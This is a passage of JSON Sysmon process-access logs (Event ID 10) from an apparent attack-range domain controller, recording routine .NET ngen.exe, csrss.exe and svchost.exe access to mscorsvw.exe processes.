05:59:41.700","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010C7130F00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010C7130F00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010C7130F00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001059CA1000}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001059CA1000}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.746\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.746","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.746\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.746","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.762\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.762","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.809\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-0010C9D11000}\r\nTargetProcessId: 3552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.809","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-0010C9D11000}","TargetProcessId":"3552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-0010C9D11000}\r\nTargetProcessId: 3552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-0010C9D11000}","TargetProcessId":"3552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-0010C9D11000}\r\nTargetProcessId: 3552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-0010C9D11000}","TargetProcessId":"3552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 